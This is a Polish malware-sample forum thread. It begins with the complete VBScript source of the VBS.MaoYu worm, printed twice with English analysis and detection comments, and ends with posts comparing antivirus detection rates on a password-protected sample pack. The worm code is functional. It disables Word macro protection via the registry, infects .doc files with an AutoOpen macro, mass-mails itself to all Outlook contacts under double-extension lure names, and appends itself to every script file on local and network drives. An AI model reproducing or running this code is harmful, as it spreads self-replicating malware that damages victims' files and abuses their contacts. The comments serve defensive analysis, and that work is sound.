Paczki, malware, złośliwe pliki, linki itp.
Yumao

Kod:
''VBS.MaoYu
''VBS.MaoYu by MaoYu(SG)
''to hell with Osama..

' Analysis note: start-up stage of the VBS.MaoYu sample.
' Every runtime error in the top-level code is suppressed, so failed steps are skipped silently.
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
' The script opens its own file for reading and keeps the full text in "virus";
' infecte() later appends that text to other script files.
Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close

' Path of the current user's "My Documents" folder; used later as the root of the *.doc search.
personal=ws.SpecialFolders("MyDocuments")

' GetSpecialFolder(0) is the Windows folder, so the script copies itself to <WindowsFolder>\MaoYu.vbs.
' Host indicator: a MaoYu.vbs file in the Windows directory, created by a script-host process.
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\MaoYu.vbs")

' Analysis note: this run writes VBA module source, one line at a time, to C:\MaoYu.sys.
' Despite the .sys extension the file is plain text; it is imported into Word VBA projects
' by the Infect macro written below and by the Doc.Import call near the end of this script.
' Host indicators: the file C:\MaoYu.sys and a VBA module named "MaoYu" in documents or in the Normal template.
Set vw=sf.CreateTextFile("C:\MaoYu.sys")
vw.WriteLine "Attribute VB_Name = ""MaoYu"""
' AutoOpen: the macro Word runs when a document containing it is opened; here it calls FishProtect, then Infect.
vw.WriteLine "Sub AutoOpen()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Call FishProtect"
vw.WriteLine "Call Infect"
vw.WriteLine "End Sub"
vw.WriteLine ""
' HelpAbout: shows a message box when the day of the month is 29.
' NOTE(review): the name presumably shadows Word's Help > About command - confirm.
vw.WriteLine "Sub HelpAbout()"
vw.WriteLine "If Day(Now) = 29 Then"
vw.WriteLine "MsgBox ""VBS.MaoYu. I love swimming. Hahahahaha"", vbInformation, ""For "" + Application.UserName"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
' Infect: moves the MaoYu module between the Normal template and the active document
' by exporting it to C:\MaoYu.sys and importing it on the other side, then saves the document.
vw.WriteLine "Sub Infect()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents"
vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents"
vw.WriteLine "Drop = ""C:\MaoYu.sys"""
vw.WriteLine "If Nor.Item(""MaoYu"").Name <> ""MaoYu"" Then"
vw.WriteLine "Doc(""MaoYu"").Export Drop"
vw.WriteLine "Nor.Import Drop"
vw.WriteLine "End If"
vw.WriteLine "If Doc.Item(""MaoYu"").Name <> ""MaoYu"" Then"
vw.WriteLine "Nor(""MaoYu"").Export Drop"
vw.WriteLine "Doc.Import Drop"
vw.WriteLine "ActiveDocument.Save"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
' FishProtect: switches off three Word options (conversion confirmation, macro virus protection,
' prompt before saving the Normal template) and, for Word 10.0 / 9.0, sets Security\Level to 1
' (plus AccessVBOM to 1 on 10.0) under HKCU.
' Detection point: writes to these Word\Security values made by Word itself or by a script host.
' Mitigation: enforce macro security and VBA-project access by policy so per-user values do not decide.
vw.WriteLine "Sub FishProtect()"
vw.WriteLine "With Options"
vw.WriteLine ".ConfirmConversions = False"
vw.WriteLine ".VirusProtection = False"
vw.WriteLine ".SaveNormalPrompt = False"
vw.WriteLine "End With"
vw.WriteLine "Select Case Application.Version"
vw.WriteLine "Case ""10.0"""
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
vw.WriteLine "Case ""9.0"""
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "End Select"
' NOTE(review): DisableAutoMacros 0 presumably leaves auto-macros enabled - confirm against WordBasic documentation.
vw.WriteLine "WordBasic.DisableAutoMacros 0"
vw.WriteLine "End Sub"
vw.Close

' Analysis note: lecteur() starts the walk over drives that leads to infecte() on script files.
lecteur()

' The same Word security values that the dropped macro sets are also written directly from the script:
' AccessVBOM = 1 (programmatic access to the VBA project) and Level = 1 for Word 10.0, Level = 1 for Word 9.0.
' NOTE(review): Level 1 is understood to be the lowest macro-security setting - confirm for these Office versions.
' Detection point: wscript/cscript writing under HKCU\Software\Microsoft\Office\<version>\Word\Security.
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"

' Analysis note: e-mail propagation through Outlook automation.
' The loops visit every entry of every MAPI address list and send one message per entry.
' Defender view: mail gateways that block .vbs attachments and double extensions stop this stage;
' the fixed subject pattern ("Re: <name>.<ext> for you.") and body text below are usable content signatures,
' and a burst of automated sends from a script host driving Outlook is a behavioural signal.
Set out=CreateObject("Outlook.Application")
Set MA=out.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count

' Build a random attachment name: 1 to 20 lowercase letters ...
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
' ... followed by a three-letter decoy extension cut out of typext and the real ".vbs" extension,
' i.e. a double-extension lure such as <name>.<decoy>.vbs.
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
' A copy of the running script is placed in the Windows folder under that name to serve as the attachment.
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname)
' The subject drops the last four characters (".vbs"), so the recipient sees only the decoy extension.
subject="Re: " & left(tmpname,len(tmpname)-4) & " for you."

Set AD=C.AddressEntries(D)
Set mail=out.CreateItem(0)
mail.To=AD.Address
mail.Subject=subject
body="Hi " & AD.Name & ","
body = body & VbCrLf & "I am MaoYu.. also known as cAtfish in chinese.. read the attachment to know more about me!"
body = body & VbCrLf & ""
body = body & VbCrLf & "    See you soon"
mail.Body=body
mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname)
' DeleteAfterSubmit means no copy is kept after sending, so the sender's mailbox shows little trace;
' server-side message tracking is the more reliable evidence source.
mail.DeleteAfterSubmit=True
If mail.To <> "" Then
mail.Send
' The temporary attachment copy is removed from the Windows folder after sending.
sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname
End If
Next
End If
Next


' Analysis note: document infection through Word automation.
' A hidden Word instance is started; the script quits if the object could not be created.
' Defender view: a script host launching Word invisibly and then saving many .doc files under
' "My Documents" is a strong behavioural signal; affected documents carry a VBA module named "MaoYu".
Set wrd=WScript.CreateObject("Word.Application")
If wrd Is Nothing Then WScript.Quit
wrd.Visible=False
' Word's FileSearch object lists every *.doc below the "My Documents" path, subfolders included.
Set srch = wrd.Application.FileSearch
srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc": srch.Execute
For f = 1 To srch.FoundFiles.Count
victim = srch.FoundFiles(f)
wrd.Documents.Open victim
' Access to VBProject is what the AccessVBOM registry value written earlier relates to.
Set Doc=wrd.ActiveDocument.VBProject.VBComponents
' If the document has no component named MaoYu, the dropped module file is imported and the document saved.
If Doc.Item("MaoYu").Name <> "MaoYu" Then
    Doc.Import ("C:\MaoYu.sys")
    wrd.ActiveDocument.Save
    End If
wrd.ActiveDocument.Close
Next
wrd.Application.Quit

Sub lecteur()
' Analysis note: enumerates the drives known to the FileSystemObject and hands the root of each
' drive of type 2 (fixed) or 3 (network) to liste().
' Defender view: mapped network shares are in scope, so script files on shared storage need
' checking as well as the local disk.
On Error Resume Next
dim f,f1,fc
Set dr = sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub

Sub infecte(dossier)
' Analysis note: file-infection routine for one folder ("dossier").
' For every file whose extension is vbs or vbe it reads the first line; when that line is not the
' marker ''VBS.MaoYu, the file is rewritten as: marker line, original content, empty line, then the
' text held in "virus" (the sample's own source, read at start-up).
' Defender view: the marker on line 1 identifies modified scripts; the original content is still
' present between the marker and the appended code, but restoring from a known-good backup is the
' safer clean-up.
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
    ' First open: read only line 1 to test for the marker.
    Set cot=sf.OpenTextFile(f1.path, 1, False)
    If cot.ReadLine <> "''VBS.MaoYu" then
    cot.Close
    ' Second open: read the whole original file before it is overwritten.
    Set cot=sf.OpenTextFile(f1.path, 1, False)
    vbsorg=cot.ReadAll()
    cot.Close
    ' Mode 2 opens the same path for writing, replacing its content.
    Set inf=sf.OpenTextFile(f1.path,2,True)
    inf.WriteLine "''VBS.MaoYu"
    inf.Write(vbsorg)
    inf.WriteLine ""
    inf.WriteLine virus
    inf.Close
    End If
End If
Next
End Sub

Sub liste(dossier)
' Analysis note: directory walker. For each subfolder of "dossier" it calls infecte() on that
' subfolder and then calls itself on it, so it is written to descend the folder tree.
' Runtime errors are suppressed, so folders that cannot be read are skipped without any message.
On Error Resume Next
Set f = sf.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
''VBS.MaoYu by MaoYu(SG)
''to hell with Osama..

' Analysis note: from here the listing repeats the code that appears earlier in the same file.
' NOTE(review): a marker line followed by two copies of the body matches the layout infecte() writes
' (marker, original file, appended source), so this listing may be a copy that was itself modified - unconfirmed.
' Start-up stage: suppress runtime errors, create the FileSystemObject and WScript.Shell objects.
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
' The script reads its own file into "virus" for later appending to other scripts.
Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
fl.Close

' "My Documents" path, used later as the root of the *.doc search.
personal=ws.SpecialFolders("MyDocuments")

' Self-copy to <WindowsFolder>\MaoYu.vbs (GetSpecialFolder(0) is the Windows folder) - a host indicator.
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\MaoYu.vbs")

' Analysis note: writes VBA module source as plain text to C:\MaoYu.sys (the .sys extension is a disguise).
' Host indicators: C:\MaoYu.sys and a VBA module named "MaoYu".
Set vw=sf.CreateTextFile("C:\MaoYu.sys")
vw.WriteLine "Attribute VB_Name = ""MaoYu"""
' AutoOpen runs when a document containing the module is opened; it calls FishProtect, then Infect.
vw.WriteLine "Sub AutoOpen()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Call FishProtect"
vw.WriteLine "Call Infect"
vw.WriteLine "End Sub"
vw.WriteLine ""
' HelpAbout shows a message box when the day of the month is 29.
vw.WriteLine "Sub HelpAbout()"
vw.WriteLine "If Day(Now) = 29 Then"
vw.WriteLine "MsgBox ""VBS.MaoYu. I love swimming. Hahahahaha"", vbInformation, ""For "" + Application.UserName"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
' Infect exchanges the MaoYu module between the Normal template and the active document via C:\MaoYu.sys.
vw.WriteLine "Sub Infect()"
vw.WriteLine "On Error Resume Next"
vw.WriteLine "Set Nor = NormalTemplate.VBProject.VBComponents"
vw.WriteLine "Set Doc = ActiveDocument.VBProject.VBComponents"
vw.WriteLine "Drop = ""C:\MaoYu.sys"""
vw.WriteLine "If Nor.Item(""MaoYu"").Name <> ""MaoYu"" Then"
vw.WriteLine "Doc(""MaoYu"").Export Drop"
vw.WriteLine "Nor.Import Drop"
vw.WriteLine "End If"
vw.WriteLine "If Doc.Item(""MaoYu"").Name <> ""MaoYu"" Then"
vw.WriteLine "Nor(""MaoYu"").Export Drop"
vw.WriteLine "Doc.Import Drop"
vw.WriteLine "ActiveDocument.Save"
vw.WriteLine "End If"
vw.WriteLine "End Sub"
vw.WriteLine ""
' FishProtect turns off three Word options and sets the Word\Security values Level (and AccessVBOM on 10.0) to 1.
' Detection point: changes to these values; mitigation: enforce macro settings by policy.
vw.WriteLine "Sub FishProtect()"
vw.WriteLine "With Options"
vw.WriteLine ".ConfirmConversions = False"
vw.WriteLine ".VirusProtection = False"
vw.WriteLine ".SaveNormalPrompt = False"
vw.WriteLine "End With"
vw.WriteLine "Select Case Application.Version"
vw.WriteLine "Case ""10.0"""
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&"
vw.WriteLine "Case ""9.0"""
vw.WriteLine "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&"
vw.WriteLine "End Select"
vw.WriteLine "WordBasic.DisableAutoMacros 0"
vw.WriteLine "End Sub"
vw.Close

' Analysis note: starts the drive walk, then writes the Word security values from the script side.
lecteur()

' AccessVBOM = 1 and Level = 1 for Word 10.0, Level = 1 for Word 9.0, all under HKCU.
' Detection point: a script host writing to HKCU\Software\Microsoft\Office\<version>\Word\Security.
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD"

' Analysis note: e-mail propagation through Outlook automation, one message per address-list entry.
' Defender view: blocking .vbs and double-extension attachments at the gateway stops this stage;
' the subject pattern and body text below can be used as content signatures.
Set out=CreateObject("Outlook.Application")
Set MA=out.GetNameSpace("MAPI")
For Each C In MA.AddressLists
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count

' Random attachment name: 1 to 20 lowercase letters, a three-letter decoy extension from typext, then ".vbs".
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
' The running script is copied into the Windows folder under that name to be used as the attachment.
sf.GetFile(WScript.ScriptFullName).Copy(sf.GetSpecialFolder(0)&"\"&tmpname)
' The subject omits the trailing ".vbs", so only the decoy extension is shown.
subject="Re: " & left(tmpname,len(tmpname)-4) & " for you."

Set AD=C.AddressEntries(D)
Set mail=out.CreateItem(0)
mail.To=AD.Address
mail.Subject=subject
body="Hi " & AD.Name & ","
body = body & VbCrLf & "I am MaoYu.. also known as cAtfish in chinese.. read the attachment to know more about me!"
body = body & VbCrLf & ""
body = body & VbCrLf & "    See you soon"
mail.Body=body
mail.Attachments.Add(sf.GetSpecialFolder(0)&"\"&tmpname)
' No copy is kept after sending; rely on server-side message tracking for evidence.
mail.DeleteAfterSubmit=True
If mail.To <> "" Then
mail.Send
sf.DeleteFile sf.GetSpecialFolder(0)&"\"&tmpname
End If
Next
End If
Next


' Analysis note: document infection through a hidden Word instance.
' Every *.doc below "My Documents" is opened; documents without a component named MaoYu get
' C:\MaoYu.sys imported into their VBA project and are saved.
' Defender view: a script host driving an invisible Word process that rewrites many .doc files
' is a behavioural signal; affected documents contain a VBA module named "MaoYu".
Set wrd=WScript.CreateObject("Word.Application")
If wrd Is Nothing Then WScript.Quit
wrd.Visible=False
Set srch = wrd.Application.FileSearch
srch.Lookin = ""&personal&"": srch.SearchSubFolders = True: srch.FileName="*.doc": srch.Execute
For f = 1 To srch.FoundFiles.Count
victim = srch.FoundFiles(f)
wrd.Documents.Open victim
Set Doc=wrd.ActiveDocument.VBProject.VBComponents
If Doc.Item("MaoYu").Name <> "MaoYu" Then
    Doc.Import ("C:\MaoYu.sys")
    wrd.ActiveDocument.Save
    End If
wrd.ActiveDocument.Close
Next
wrd.Application.Quit

Sub lecteur()
' Analysis note: passes the root of every drive of type 2 (fixed) or 3 (network) to liste().
' Network shares are therefore in scope when checking for modified script files.
On Error Resume Next
dim f,f1,fc
Set dr = sf.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub

Sub infecte(dossier)
' Analysis note: for each .vbs/.vbe file in "dossier" whose first line is not the marker
' ''VBS.MaoYu, the file is rewritten as marker + original content + empty line + the text in "virus".
' Defender view: the marker on line 1 identifies modified scripts; restore them from a known-good backup.
On Error Resume Next
Set sf=CreateObject("Scripting.FileSystemObject")
Set f = sf.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = sf.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe") Then
    ' Read line 1 only, to test for the marker.
    Set cot=sf.OpenTextFile(f1.path, 1, False)
    If cot.ReadLine <> "''VBS.MaoYu" then
    cot.Close
    ' Read the complete original content before overwriting the file.
    Set cot=sf.OpenTextFile(f1.path, 1, False)
    vbsorg=cot.ReadAll()
    cot.Close
    Set inf=sf.OpenTextFile(f1.path,2,True)
    inf.WriteLine "''VBS.MaoYu"
    inf.Write(vbsorg)
    inf.WriteLine ""
    inf.WriteLine virus
    inf.Close
    End If
End If
Next
End Sub

Sub liste(dossier)
' Analysis note: for each subfolder of "dossier" it calls infecte() and then itself on that subfolder.
' Errors are suppressed, so unreadable folders are skipped silently.
On Error Resume Next
Set f = sf.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub



Dodano: 18 lip 2011 19:40

Paczka

Treść widoczna jedynie dla zarejestrowanych użytkowników

hasło: sg

Tongue
Avast! Internet Security 6 + Emsisoft Mamutu 3 + Hitman Pro 3.5 (On-Demand)

[Aby zobaczyć linki, zarejestruj się tutaj]

FIS 2012
351/403 87%
ESET 364/403 (90,3%)
ESET NOD32 5 + PC Tools Firewall Plus + Truecrypt
Może ktoś sprawdzić FIS-a na dzisiejszych próbkach?
akurat trafiłeś Tongue
fis 2012
Lock Em All - żaden nie jest wykryty; uruchomienie: 1. reset systemu, 2. zablokowanie systemu, wyskoczyło jakieś okienko po rusku, 3. runtime error
falszywy skaner - wykryty
trojan gozi - nie wykryty,uruchomienie reset systemu i ćma tylko kursor pozostal (poprawka wstal system ale po dlugim okresie)
trojan sinowal - wykryty
very danger - wykryty
link - nie chce wejść na wirtualu ani na Operze, ani na Explorerze
Uuuu, a masz możliwość sprawdzić Mamutu?
kamil10506 napisał(a):Może ktoś sprawdzić FIS-a na dzisiejszych próbkach?


mam trochę czasu więc jak chcesz mogę FIS-a sprawdzić na najświeższej paczce od Tommy tzn. skan a to co zastawi uruchamiane Tongue


Dodano: 18 lip 2011 21:26

kamil10506 napisał(a):Uuuu, a masz możliwość sprawdzić Mamutu?


no chyba że inna opcja Suspicious
Avast! Internet Security v8.0.1482
Dzięki Smile
Tylko ustaw zaaw. heurystykę i DeepGuarda (monitorowanie)
kamil10506 napisał(a):Dzięki Smile
Tylko ustaw zaaw. heurestykę i Deepguarda (monitorowanie)


ok tylko to trochę potrwa Grin
Avast! Internet Security v8.0.1482
Spoko Smile
już 2 raz wysypał się podczas aktualizacji

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]


jednak będę musiał pobrać nową wersję Sad
Avast! Internet Security v8.0.1482
Wysypal sie podczas aktualizacji wersji programu, czy sygnatur?
aktualizacji programu bo miałem jeszcze starą beta
Avast! Internet Security v8.0.1482
Też mialem ten problem. Trzeba zglosic do F-Secure. Tez musialem instalowac od nowa.
kamil10506 napisał(a):Też mialem ten problem. Trzeba zglosic do F-Secure. Tez musialem instalowac od nowa.


tylko że nie mam pojęcia jak mogę pobrać tego instalatora Sad
Avast! Internet Security v8.0.1482
Zaraz zapodam link. Mam nadzieję, że masz klucz?

//Po usunięciu odpalasz to

[Aby zobaczyć linki, zarejestruj się tutaj]

Restart i instalujesz

[Aby zobaczyć linki, zarejestruj się tutaj]

kluczyk mam..
dzięki za info i dopiero teraz zobaczyłem że miałem e-mail od nich z linkami Wall

no i próbowałem instalować ze starego instalatora i nie wiem czemu nie chciało pójść bo w końcu pliki pobiera online.
Avast! Internet Security v8.0.1482
CIS 2011 - 360/403 (89,3%)

CIS 2011 + MBAM PRO - 390/403 (96,8%)
FIS 2012 (403 Malware by Tommy)

[Aby zobaczyć linki, zarejestruj się tutaj]


6 zagrożeń ostatnich nie uruchomiłem bo zamuliło mi virtuala Tongue


Dodano: 19 lip 2011 02:53

Emsisoft A-M (403 Malware by Tommy)

[Aby zobaczyć linki, zarejestruj się tutaj]


Tongue
Avast! Internet Security v8.0.1482
Dzięki Tongue
Tylko na przyszłość: po skanowaniu nie dawaj na automatyczne usuwanie, bo FIS często nie usuwa wirusów i wtedy musisz usunąć je ręcznie.
Emsisoft bardzo dobrze.